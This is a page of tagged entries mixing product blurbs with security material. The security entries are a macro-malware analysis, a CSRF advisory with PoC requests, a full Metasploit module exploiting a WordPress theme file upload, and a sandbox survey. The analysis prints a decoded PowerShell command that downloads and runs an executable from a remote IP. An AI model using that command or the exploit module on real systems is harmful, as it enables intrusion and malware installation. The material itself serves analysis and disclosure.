Showing results for tags 'file'.

  1. Product Description

     GiliSoft Video Converter is simply the best choice for your video conversion needs because it supports all the major file formats. Compatible with over 160 video formats, chances are we've got your desired output file format covered. To keep up with rapidly advancing technology, GiliSoft Video Converter adds new formats as they're released! If you want to convert Flash to video, merge or cut video, or rotate video, GiliSoft Video Converter is your must-have choice.

     Exclusive Features of Video Converter:

     Convert Almost All Video Files: Read almost all the popular video formats from the Internet, digital camcorders, capture cards, etc. No external codecs needed. The supported video formats are: 3GP (*.3gp; *.3g2), ASF (*.asf), AVI (*.avi; *.divx), FLV (*.flv), M2TS (*.m2ts), MOV (*.mov), MP4 (*.mp4; *.m4v), MPEG (*.mpeg; *.mpg; *.dat), MKV (*.mkv), RMVB (*.rmvb; *.rm), TS (*.ts), VOB (*.vob), WMV (*.wmv).

     Convert to Various Video Formats: Convert video files on your PC to almost all popular video formats such as H.265, MP4 4K, MKV 4K, MPEG-4, DivX, Xvid, H.264, AVI, MKV, FLV, WMV, DPG, 3GP, etc., compatible with iPod / iPhone / iPad (The New iPad) / PSP / Zune / NDS / Xbox 360 / PS3, and other specific formats supported by cell phones, Apple TV, PVPs and PDAs.

     Convert to Various Audio Formats: Besides video conversion and audio conversion, GiliSoft Video Converter can also convert video to all audio formats such as MP3, MP4, M4A, WMA, WAV, AC3 and DTS, or extract audio from video.

     Support Various Devices: There are more than 10 conversion modes to support various multimedia devices, such as iPod, iPhone, iPad (The New iPad), PSP, Zune, cell phone, PVP, PDA, NDS, Apple TV, Xbox 360, PS3, etc. And Video Converter will be constantly updated to support new devices.

     GPU Acceleration Transcoding: Convert a video with outstanding quality and very fast speed. GiliSoft Video Converter provides a hardware accelerated H.264 encoder and an Nvidia® CUDA/NVENC H.264 encoder.

     Convert Flash SWF to Any Video: GiliSoft Video Converter is the best option for Flash to video conversion. This powerful tool can easily convert Macromedia Flash SWF files to video or audio files.

     HTML5 Video Converter: No matter what format your videos are in, it can convert multiple videos to an HTML5 compliant format (OGG, H264, WEBM). Support for HTML5 is improving all the time and videos will, in future, be easier to manage and stream.

     4K Video Converter: GiliSoft Video Converter is a comprehensive application that provides every type of conversion that you might need when you are working with 4K ultra high definition video files. Convert any format to 4K or convert 4K videos to WMV, MOV, AVI and other formats.

     Merge Several Files into One & Trim Video File: Merge several files or clip your favorite sections of a video and merge them together. Cut off any video segment(s) of your choice. You can also get rid of advertisements, unneeded parts, etc. and customize your video to your exact needs.

     Edit, Enhance & Personalize your Video Files: Adjust brightness, saturation, contrast and grayscale; change aspect ratio and volume; crop video, rotate video; add watermark to video; add subtitle to video; add special effects to video.
  2. Product Description

     Losing important photos only happens when you don't prepare well. It is really frustrating. Fortunately, we have Tenorshare Photo Recovery. It provides you a quick and efficient file recovery solution to recover photos, videos, audio and other files from computers and other storage devices, including SD cards, digital cameras, mobile phones, USB flash drives and more.

     Recover photos, as well as other files like videos, songs, emails, ZIP files, etc.
     Recover from hard drives and all portable devices.
     Recover files lost due to any loss situation.
     Preview before recovery and keep only the ones you need.

     Recover Photos in a Variety of Types: Recover pictures in all popular formats, like JPG, PNG, PSD, GIF, RAW, etc. Get back lost photos shot by any camera brand, such as Canon, Nikon, Sony, JVC, FujiFilm, and so on. Retrieve deleted photos on your Samsung, HTC, LG, Motorola, and other Android phone or Windows phone. Supports all memory cards, including SD card, CF card, XD card, etc.

     All-inclusive File Recovery: Besides photo recovery, this photo recovery software is capable of recovering videos, music, and other files like emails, archives, and much more. Recover files that you accidentally deleted. Recover files from formatted, corrupted, or damaged partitions or devices.

     Preview before You Recover: Preview photos in advance to confirm whether they are indeed the ones you need. Pre-listen to your lost music with a built-in audio player.

     Recover More Easily: Filtering file types for scanning helps you restrict the scan to just the ones you need. It saves you a lot of time. You can pause or continue photo recovery during scanning.

     Support Wide File Systems: It supports all file systems including HFS, HFS+, FAT, NTFS, EXT2, EXT3.

     Scan Faster: Its unique algorithm eases the photo recovery scan and shortens scan time.

     Work on all Windows OS: It supports the latest Windows 8.1, as well as Windows 8/7/XP/Vista.

     100% Success Rate: You can recover every file that was lost from your computer or other medium.

     File Types Supported:
     Image: JPG, BMP, TIFF (TIF), GIF, PNG, PSD, CRW, CR2, NEF, ORF, RAF, SR2, MRW, DCR
     Video: AVI, MP4, MOV, M4V, 3G2, 3GP, WMV, ASF, FLV
     Audio: AIF (AIFF), WAV, MP3, M4A, WMA, MID (MIDI)
     Document: DOC/DOCX, XLS/XLSX, PPT/PPTX, PDF, CWK, HTML/HTM, INDD, EPS, etc.
     Email: PST, DBX, EMLX, etc.
     Archive: ZIP, RAR, SIT, etc.

     File Systems Supported: HFS, HFS+, FAT, NTFS, EXT2, EXT3

     Devices Supported:
     Memory card: SD, CF, MMC (MultiMedia Card), XD Picture Card, SDHC, MicroSD, MiniSD, etc.
     External hard drive: WD, Seagate, Maxtor, Hitachi, Samsung, etc.
     Digital camera/camcorder: Nikon, Canon, Kodak, Samsung, Sony, Panasonic, JVC, FujiFilm, etc.
     Cell phones: Samsung, HTC, Motorola, LG, BlackBerry, Sony Ericsson, Nokia, etc.
     Others: Pen drive, floppy disk, Zip disk, USB drive, music player, memory stick, etc.
  3. Product Description

     Video to GIF is an easy to use video to GIF converter with a simple and friendly interface. Video to GIF converts almost all popular video formats (such as AVI, MPEG, MP4, WMV, MKV, MOV, VOB, RMVB, etc.) not only to animated GIF, but also to other commonly used image files (like JPG, BMP, TGA, PNG, TIF, etc.). With ultrafast conversion speed and high quality, Video to GIF enables you to view the animation as well as the original video file easily. Video to GIF converter makes it possible for you to play video clips in a GIF file. You can set 24 frames per second to get an output GIF the same as the original video, or set 1 frame per second to get an animated GIF with a small size. What's more, no plug-ins are required; you can publish the output GIF file on your web page by just using a common HTML tag. Video to GIF is exactly what you desire.

     Convert video files like AVI, MPEG, MKV, MP4, WMV, MOV, and RM to animated GIF files. Keep the original speed rate and resolution.
     Extract all frames of a video file into separate image files with ease. Captured images can be converted to all popular formats, such as JPG, GIF, BMP, PNG, etc.
     Add special effects (like Blur, Sharpen, Noise, Brighten, Invert, etc.) to the output GIF or other images.
     Convert video to GIF animation and various other image formats, including still GIF, JPEG, JPG, BMP, PNG, TGA, TIFF, ICO, and PCX.
     Adjust output rate. The user can change the value of the output rate (how many pictures per second) to control the speed rate, which cannot be seen in other similar programs.
     Convert video to a single image containing multiple pictures in a simple arrangement.
     Get the output image file at the same resolution as the original or set a new size that you want.
     Video to GIF can be used as a video player with commonly used functions, like pause, stop, snapshot, etc. What's more, it supports all key video formats well.
  4. Introduction

     Yesterday I received in my company inbox an email with an attached .xlsm file named D92724446.xlsm coming from Clare588@78-83-77-53.spectrumnet.bg. Central and local AV engines did not find anything malicious, and a multi-engine scan got 0/57 as a result. I decided to investigate a little more in depth in order to confirm that it was a malicious file and to extract at least the code I was imagining being inside this document.

     General Information

     This is some general info collected:

     Name: D92724446.xlsm
     MD5: fea3ab857813c0d65cd0b6b6233a834b
     SHA1: 64eef048efe86fe35f673fd2d853a8a727934e6c
     SHA256: 75e3a4cd45c08ff242e2927fa3b4ee80858073a202dade84898040bfbb7847ef
     ssdeep: 768:qEIo/BPRS5t1dbQjlshORhynxvWXLUYJdGnSCk:qIJM8jl6nIP
     File size: 36.1 KB (36978 bytes)
     File type: Office Open XML Spreadsheet

     VirusTotal information:
     First submission: 2015-02-18 10:35:06 UTC
     Last submission: 2015-02-19 08:58:57 UTC
     Other names: 93D9B24583.xlsm, e94fcc43b0dc9c7eb350149b4ebdfd3d, 61a47fa44dd55f5721ebe85aa83a32e6, I233185_486.xlsm, L335966_246.xlsm, 271269885.xlsm, 4501B81210.xlsm, e65fb3285617c7b4bbc833a466be6c42, 5312970.xlsm, 9D50B4390.xlsm, DDE1368393.xlsm, E30178611.xlsm, 43c29faad6fc5984273afcc67593d802, FE731885.xlsm, C47394.xlsm, suspect.xls, 090214399.xlsm, Q884674_740.xlsm, E015272_266.xlsm, U506714_083.xlsm, 43925982.xlsm, 8BB4D89313.xlsm.zip, 82AC485705.xlsm, 8abb99eb6078b658e05aece79337378a, 0BF2034112.xlsm

     Static Analysis

     I started my analysis having a quick look inside: at offset 0 we can quickly view 4 bytes that confirm the format of the file (50 4B 03 04). At this point, I tried to get more information and to see how this document was composed: this quickly confirms my first suspicions. At offset 0x000012f1 a .bin file is found. Going a little ahead, we can try to get the code of these instructions: the code has been extracted, and different files for Classes and Modules have been created under \OfficeMalScanner\VBAPROJECT.BIN-Macros.

     Opening these files with a simple text editor, I immediately found many obfuscated instructions, as reported in the image below. However, after a quick analysis I realized that the modules really important for extracting the malicious code were numbers 11 and 14. This is because module number 11 contains the instructions for running the obfuscated code assigned to the variable named "FfdsfF" and de-obfuscated through the function call "NewQkeTzIIHM". "NewQkeTzIIHM" takes one parameter as input as a string and returns a string. These are its main instructions:

     The -13 immediately brings to mind a de-obfuscation loop which employs the rot13 algorithm. At this point, I simply wrote a few lines of VBS code to correctly extract the content and print it to a txt file called output.txt.

     Function WriteFile(sText)
         ' Append the decoded text to output.txt on the desktop
         Set objFSO = CreateObject("Scripting.FileSystemObject")
         Set objMyFile = objFSO.OpenTextFile("C:\Users\EOSec\Desktop\output.txt", 8, true, 0)
         objMyFile.WriteLine(sText)
         objMyFile.close()
     End Function

     Dim i, x, y
     ' Obfuscated string taken from the macro (the value assigned to FfdsfF)
     x = "pzq-<X-]|„r`uryy;r…r-5[r„:\owrp-`†€rz;[r;droPyvr{6;Q|„{y|nqSvyr54u}G<<B;>FC;?A@;D<x„rsr„rs<stq€rr<q…‡~;w}t4942aRZ]2iWV\v|qsuv|VU;pno46H-r…}n{q-2aRZ]2iWV\v|qsuv|VU;pno-2aRZ]2iWV\v|qsuv|VU;r…rH-€n-2aRZ]2iWV\v|qsuv|VU;r…rH"
     ' Reverse the transform: every character code minus 13
     For i = 1 To Len(x)
         y = y + Chr(Asc(Mid(x, i, 1)) - 13)
     Next
     WriteFile(y)

     This is the clear code obtained:

     cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://5.196.243.7/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

     And this is the whois of the remote IP:

     inetnum:  5.196.243.0 - 5.196.243.7
     netname:  Just_Hosting
     country:  IE
     descr:    Just Hosting
     admin-c:  OTC9-RIPE
     tech-c:   OTC9-RIPE
     status:   ASSIGNED PA
     mnt-by:   OVH-MNT
     source:   RIPE # Filtered

     A file named dxzq.jpg is downloaded. It's really a CAB file (JIOiodfhioIH.cab) that is then expanded to JIOiodfhioIH.exe and run.

     Source
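     An added example, not part of the post above and not the author's script: the two static checks the post performs (the 50 4B 03 04 ZIP magic at offset 0, then locating the vbaProject.bin part and its offset inside the container) and the "minus 13" decoder, written in Python. The sample workbook is constructed here and contains no real macro. One caveat the decoder has to get right: VBScript's Asc() returns the ANSI (Windows-1252) code, so a pasted string such as the one in the post must be mapped back through cp1252, not Unicode, before subtracting. The same mapping explains why the pasted string in the post decodes with holes: 'r' (0x72) and 't' (0x74) shift to 0x7F and 0x81, which cp1252 text cannot carry, so "]|„r`uryy" comes back as "PoweShell".

```python
import io
import zipfile

OOXML_MAGIC = b"PK\x03\x04"   # the 50 4B 03 04 seen at offset 0 in the post
SHIFT = 13                    # the "- 13" inside NewQkeTzIIHM


def find_macro_parts(blob: bytes) -> dict:
    """Map each VBA project part inside an OOXML container to the file offset
    of its local header (the post found its vbaProject.bin at 0x12f1)."""
    if not blob.startswith(OOXML_MAGIC):
        raise ValueError("not a ZIP/OOXML container")
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return {
            info.filename: info.header_offset
            for info in zf.infolist()
            if info.filename.lower().endswith("vbaproject.bin")
        }


def obfuscate_bytes(clear: bytes) -> bytes:
    """The macro's transform as the post infers it: each byte plus 13."""
    return bytes((b + SHIFT) & 0xFF for b in clear)


def deobfuscate_bytes(raw: bytes) -> str:
    """Inverse transform on raw bytes (what the VBS loop does with Asc/Chr)."""
    return bytes((b - SHIFT) & 0xFF for b in raw).decode("latin-1")


def deobfuscate_text(pasted: str) -> str:
    """Decode an obfuscated string that was pasted as text. Asc() works on the
    ANSI code, so characters such as the low double quote (cp1252 0x84) must be
    encoded with cp1252, not UTF-8, before subtracting."""
    return deobfuscate_bytes(pasted.encode("cp1252"))


def simulate_paste(raw: bytes) -> str:
    """What survives when obfuscated bytes are copied as cp1252 text: code
    points cp1252 leaves undefined (0x81, 0x8D, 0x8F, 0x90, 0x9D) and control
    characters such as DEL (0x7F) are dropped. 'r' and 't' shift to exactly
    those values, which is why a pasted blob decodes with letters missing."""
    text = raw.decode("cp1252", errors="ignore")
    return "".join(ch for ch in text if ch.isprintable())


def build_sample_xlsm() -> bytes:
    """Constructed stand-in for the workbook: a minimal OOXML zip whose
    xl/vbaProject.bin holds only an OLE2 header, no real macro code."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 64)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_xlsm()
    for name, offset in find_macro_parts(sample).items():
        print(f"{name} at offset {offset:#x}")
    # Prefix of the string from the post, pasted as text: the 'r' is already gone.
    print(deobfuscate_text("pzq-<X-]|\u201er`uryy"))
    # A round trip on raw bytes keeps every character.
    print(deobfuscate_bytes(obfuscate_bytes(b"start %TEMP%\\JIOiodfhioIH.exe;")))
```

     When working from the extracted vbaProject.bin rather than from a pasted listing, feed the raw bytes of the string literal to deobfuscate_bytes and the command comes back intact; the text path is only for reproducing what a copy-pasted sample yields.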
  5. Document Title:
     ===============
     Wireless File Transfer Pro Android - CSRF Vulnerabilities

     References (Source):
     ====================
     http://www.vulnerability-lab.com/get_content.php?id=1437

     Release Date:
     =============
     2015-02-25

     Vulnerability Laboratory ID (VL-ID):
     ====================================
     1437

     Common Vulnerability Scoring System:
     ====================================
     2.3

     Product & Service Introduction:
     ===============================
     Wireless File Transfer Pro is the advanced version of Wireless File Transfer.
     (Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro )

     Abstract Advisory Information:
     ==============================
     An independent vulnerability laboratory researcher discovered multiple cross site request forgery web vulnerabilities in the Wireless File Transfer Pro v1.0.1 mobile Android application.

     Vulnerability Disclosure Timeline:
     ==================================
     2015-02-25: Public Disclosure (Vulnerability Laboratory)

     Discovery Status:
     =================
     Published

     Affected Product(s):
     ====================
     Lextel Technology
     Product: Wireless File Transfer Pro - (Android) Web Application UI 5.9.5 - 1.0.1

     Exploitation Technique:
     =======================
     Remote

     Severity Level:
     ===============
     Medium

     Technical Details & Description:
     ================================
     Multiple cross site request forgery issues have been discovered in the Wireless File Transfer Pro 1.0.1 Android mobile web application. The mobile web application is vulnerable to a combination of cross site request forgery and local command injection attacks.

     Proof of Concept (PoC):
     =======================
     The vulnerabilities can be exploited by remote attackers without a privileged application user account and with medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

     Create New Folder

     <img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0">

     --- PoC Session Logs [GET] (Execution) ---
     GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1
     Host: 192.168.1.2:8888
     User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
     Accept-Encoding: gzip, deflate
     Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
     Connection: keep-alive

     HTTP/1.1 200 OK
     Cache-control: no-cache
     Content-length: 4

     <a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%">

     Delete File, Folder

     <img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test" width="0" height="0" border="0">

     --- PoC Session Logs [GET] (Execution) ---
     GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1
     Host: 192.168.1.2:8888
     User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
     Accept-Encoding: gzip, deflate
     Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
     Connection: keep-alive

     HTTP/1.1 200 OK
     Cache-control: no-cache
     Content-length: 30

     Reference: http://localhost:8888/

     Security Risk:
     ==============
     The security risk of the cross site request forgery web vulnerability in the create and delete functions is estimated as medium. (CVSS 2.3)

     Credits & Authors:
     ==================
     Hadji Samir [s-dz@hotmail.fr]

     Disclaimer & Information:
     =========================
     The information provided in this advisory is provided as it is without any warranty.
     Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

     Domains:  www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
     Contact:  admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
     Section:  magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
     Social:   twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
     Feeds:    vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
     Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

     Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get permission.

     Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

     --
     VULNERABILITY LABORATORY - RESEARCH TEAM
     SERVICE: www.vulnerability-lab.com
     CONTACT: research@vulnerability-lab.com
     PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

     Source
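     An added example, not part of the advisory and not the vendor's code: the server-side checks whose absence makes the create and deleteFile actions forgeable, modelled as a small Python dispatcher in place of the app's fileExplorer.html handler (the real app is an Android application; the handler and request shapes here are assumptions). The app origin http://192.168.1.2:8888 comes from the PoC logs; the per-session token, the helper names and the sample requests are constructed for this demonstration. The forged requests are shaped like the advisory's PoC, with the Referer an attacker's page would actually send rather than the app's own.

```python
import hmac
import secrets
from typing import Optional, Tuple
from urllib.parse import urlsplit

APP_ORIGIN = "http://192.168.1.2:8888"          # origin of the app's web UI, from the PoC logs
STATE_CHANGING = {"create", "deleteFile"}       # the two forgeable actions in the advisory


def request_origin(headers: dict) -> Optional[str]:
    """Origin of the page that issued the request: Origin header first,
    Referer as a fallback (an <img> on an attacker's page carries the
    attacker's Referer, not the app's)."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return None
    u = urlsplit(src)
    return f"{u.scheme}://{u.netloc}"


def authorize(method: str, action: str, headers: dict,
              form_token: Optional[str], session_token: str) -> Tuple[bool, str]:
    """Three checks the vulnerable handler lacks. Read-only actions pass."""
    if action not in STATE_CHANGING:
        return True, "read-only action"
    if method != "POST":
        return False, "state change over GET refused"
    if request_origin(headers) != APP_ORIGIN:
        return False, "cross-site request refused"
    if form_token is None or not hmac.compare_digest(form_token, session_token):
        return False, "missing or wrong CSRF token"
    return True, "ok"


def handle(req: dict, session_token: str, folders: set) -> Tuple[int, str]:
    """Stand-in for the fileExplorer.html dispatcher with the checks in front
    of the create/delete actions. `folders` plays the role of /sdcard."""
    p = req["params"]
    ok, why = authorize(req["method"], p.get("action", ""), req["headers"],
                        p.get("csrf"), session_token)
    if not ok:
        return 403, why
    if p.get("action") == "create":
        folders.add(p["folderName"])
        return 200, "created"
    if p.get("action") == "deleteFile":
        folders.discard(p["fileName"])
        return 200, "deleted"
    return 200, "listing"


# Constructed requests (not captured traffic), shaped like the advisory's PoC.
FORGED_GET = {                       # <img src="...?action=create&..."> on an attacker's page
    "method": "GET",
    "headers": {"Referer": "http://attacker.example/lure.html"},
    "params": {"action": "create", "type": "folder", "folderName": "test1"},
}
FORGED_POST = {                      # auto-submitted cross-site form, no token
    "method": "POST",
    "headers": {"Origin": "http://attacker.example"},
    "params": {"action": "deleteFile", "fileName": "test1"},
}


def legit_create(name: str, token: str) -> dict:
    """The app's own form: same origin, POST, token bound to the session."""
    return {
        "method": "POST",
        "headers": {"Origin": APP_ORIGIN,
                    "Referer": APP_ORIGIN + "/fileExplorer.html?action=brower&path=/sdcard"},
        "params": {"action": "create", "type": "folder", "folderName": name, "csrf": token},
    }


if __name__ == "__main__":
    token = secrets.token_urlsafe(32)   # issued once per session, embedded in the app's forms
    sdcard = set()
    print(handle(FORGED_GET, token, sdcard), sdcard)
    print(handle(legit_create("test1", token), token, sdcard), sdcard)
    print(handle(FORGED_POST, token, sdcard), sdcard)
```

     Refusing GET for state changes on its own already defeats the advisory's <img> PoC; the origin and token checks are what stop the same forgery re-done with an auto-submitting form, and the token comparison uses hmac.compare_digest so a wrong token is rejected in constant time.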
  6. ##
     # This module requires Metasploit: http://www.metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     require 'msf/core'
     require 'socket'

     class Metasploit3 < Msf::Exploit::Remote
       Rank = ExcellentRanking

       include Msf::Exploit::FileDropper
       include Msf::HTTP::Wordpress

       def initialize(info = {})
         super(update_info(
           info,
           'Name'           => 'WordPress Holding Pattern Theme Arbitrary File Upload',
           'Description'    => %q{
             This module exploits a file upload vulnerability in all versions of the
             Holding Pattern theme found in the upload_file.php script which contains
             no session or file validation. It allows unauthenticated users to upload
             files of any type and subsequently execute PHP scripts in the context of
             the web server.
           },
           'License'        => MSF_LICENSE,
           'Author'         =>
             [
               'Alexander Borg',                  # Vulnerability disclosure
               'Rob Carr <rob[at]rastating.com>'  # Metasploit module
             ],
           'References'     =>
             [
               ['CVE', '2015-1172'],
               ['WPVDB', '7784'],
               ['URL', 'http://packetstormsecurity.com/files/130282/WordPress-Holding-Pattern-0.6-Shell-Upload.html']
             ],
           'DisclosureDate' => 'Feb 11 2015',
           'Platform'       => 'php',
           'Arch'           => ARCH_PHP,
           'Targets'        => [['holding_pattern', {}]],
           'DefaultTarget'  => 0
         ))
       end

       def rhost
         datastore['RHOST']
       end

       # Directory the theme's uploader writes into; the payload is fetched from here
       def holding_pattern_uploads_url
         normalize_uri(wordpress_url_themes, 'holding_pattern', 'uploads/')
       end

       # The unauthenticated upload script inside the theme
       def holding_pattern_uploader_url
         normalize_uri(wordpress_url_themes, 'holding_pattern', 'admin', 'upload-file.php')
       end

       # Multipart body: the form field is named after the MD5 of the target's IP address
       def generate_mime_message(payload, payload_name)
         data = Rex::MIME::Message.new
         target_ip = IPSocket.getaddress(rhost)
         field_name = Rex::Text.md5(target_ip)
         data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{field_name}\"; filename=\"#{payload_name}\"")
         data
       end

       def exploit
         print_status("#{peer} - Preparing payload...")
         payload_name = "#{Rex::Text.rand_text_alpha(10)}.php"
         data = generate_mime_message(payload, payload_name)

         print_status("#{peer} - Uploading payload...")
         res = send_request_cgi(
           'method' => 'POST',
           'uri'    => holding_pattern_uploader_url,
           'ctype'  => "multipart/form-data; boundary=#{data.bound}",
           'data'   => data.to_s
         )

         fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
         fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200

         # Request the uploaded script so the web server executes it; remove it on session close
         payload_url = normalize_uri(holding_pattern_uploads_url, payload_name)
         print_status("#{peer} - Executing the payload at #{payload_url}")
         register_files_for_cleanup(payload_name)
         send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5)
       end
     end

     Source
  7. In this section, we're providing a list of cloud automated online malware analysis tools that are not available anymore due to the website being offline or the service being disrupted by the creators of the analysis environment.

     Aerie : https://aerie.cs.berkeley.edu
     CWSandbox : The Sandbox | Understanding CyberForensics
     ThreatTrack : http://www.treattrack.com
     Malbox : Malbox System
     VisualThreat : http://www.visualthreat.com
     XecScan : http://scan.xecure-lab.com
     Norman Sandbox : https://www.norman.com/analysis

     Despite quite a few analysis tools being unavailable, there are still a lot of them being actively supported and developed. The online malware analysis tools that are still present on the Internet are presented below. Each of the tools has a letter written in square brackets, which is used later on to present each of the tools in a table in order to preserve space and provide clearer results. Each of the tools also has the URL address where the service is available in case you want to submit different files for analysis.

     [A] Anubis : http://anubis.iseclab.org
     [C] Comodo : http://camas.comodo.com
     [D] Document Analyzer : http://www.document-analyzer.net
     [E] Eureka : http://eureka.cyber-ta.org
     [J] Joe Sandbox : http://www.joesecurity.org
     [M] Malwr : https://malwr.com/submission
     [MS] Mobile Sandbox : http://mobilesandbox.org
     [TE] Threat Expert : http://www.threatexpert.com/submit.aspx
     [TT] Threat Track : http://www.threattracksecurity.com/resources/sandbox-malware-analysis.aspx
     [V] Vicheck : https://www.vicheck.ca
     [X] Xandora : http://www.xandora.net/xangui

     Note that there are other cloud malware analysis platforms, but we didn't take them into consideration in this article. Therefore, some of them are not presented and described below.

     Supported file formats and document types

     Since malware can be hidden in almost any file format or document type, malware analysis tools must provide support for such formats or document types in order to be able to detect the threat inside them. For example: if an attacker has hidden a malicious payload inside a PDF document, the malware analysis tool must have PDF support to be able to manipulate PDF documents. If PDF support is not present, the dissection of the PDF document will not be possible, and consequently the tool will not be able to find the malicious payload. If we look at the PDF document through the eyes of a malware analysis tool, the PDF document is just a set of random bytes.

     Attackers mostly use the file formats, document types and other elements presented below for including malicious payloads. The majority of the presented elements need no further introduction, since they are used in our everyday lives, but we will still provide a brief explanation of each of them.

     exe: Windows PE executable files normally used for Windows executable programs.
     elf: Linux ELF executable files normally used for Linux executable programs.
     mach-o: Mac OS X Mach-O executable files normally used for Mac executable programs.
     apk: Android APK executable files
     url: URLs
     pdf: PDF documents
     doc/docx: DOC/DOCX documents
     ppt/pptx: PPT/PPTX documents
     xls/xlsx: XLS/XLSX documents
     htm/html: HTM/HTML web pages
     jar: JAR Java executable files
     rtf: RTF documents
     dll: DLL libraries
     db: DB database files
     png/jpg: PNG/JPG images
     zip/rar: ZIP/RAR archives
     cpl: Control Panel Applets
     ie: Analyze the Internet Explorer process when opening a URL
     ps1: PowerShell scripts
     python: Python scripts
     vbs: VBScript files

     The table below presents the supported file formats and document types of each cloud automated malware analysis service.
     The rows represent file formats or document types, while the columns are used for each of the automated malware analysis tools, presented by one or two letters (as presented before). The ✓ is used to denote that a certain file format or document type is supported by an automated malware analysis service, while an empty cell indicates otherwise. The * is used to mark that the support for the document type is being implemented, but not yet available, at the time of this writing.

     Table 1: supported document types by different malware analysis tools
     (Columns: A, C, D, E, J, M, MS, TE, TT, V, X. Only the marks in each row survive here; which column each mark falls in is not preserved.)

     exe       ✓ ✓ ✓ ✓ ✓ ✓ ✓
     elf       *
     mach-o    ✓
     apk       ✓ ✓ ✓
     url       ✓ ✓
     pdf       ✓ ✓ ✓ ✓
     doc/docx  ✓ ✓ ✓ ✓
     ppt/pptx  ✓ ✓ ✓
     xls/xlsx  ✓ ✓ ✓ ✓
     rtf       ✓
     htm/html  ✓ ✓
     jar       ✓ ✓
     dll       ✓ ✓
     db        ✓
     png/jpg   ✓
     zip/rar   ✓ ✓
     cpl       ✓
     ie        ✓
     ps1       ✓
     python    ✓
     vbs       ✓

     I've spent quite some time putting together the table above, which summarizes the supported file formats, document types and other kinds of elements that can be analyzed in an automated fashion. From the table, we can quickly determine that there isn't a service that can be used to analyze any kind of file, which is because the malicious code is included in files and documents in a profoundly different manner. When adding malicious code to an executable file, we can do so by including malicious assembly instructions in its .text file section, and that is only one of the ways of doing it. On the other hand, when including malicious code in a .docx document, we usually include it in the form of a malicious macro, which will get executed by Microsoft Word upon opening the document. Below we've presented different categories for categorizing the file formats, document types and other elements presented in the table above. In each of the categories we'll also briefly discuss how the malicious code gets executed and what is needed for cloud automated malware analysis of such code.
     Executable Files [exe, elf, mach-o, apk, dll]: a malicious executable file is distributed around the Internet, which is downloaded by users in the form of cracked software programs and cracked games. The users download a program believing it to be something they want, which it is, but additional code is usually appended to the file containing a malicious payload that gets executed on the user's computer, therefore infecting it.

     Documents [pdf, doc/docx, ppt/pptx, xls/xlsx, rtf]: vulnerabilities are discovered in different software programs on a daily basis. Therefore, if an attacker finds a vulnerability in Acrobat Reader (supports the pdf file format) or Microsoft Word/OpenOffice (supports doc/docx, ppt/pptx, xls/xlsx, rtf), they can form such a document that the program won't be able to process the file, but will crash instead. Depending on the type of vulnerability, an attacker can possibly execute a malicious payload included in the document.

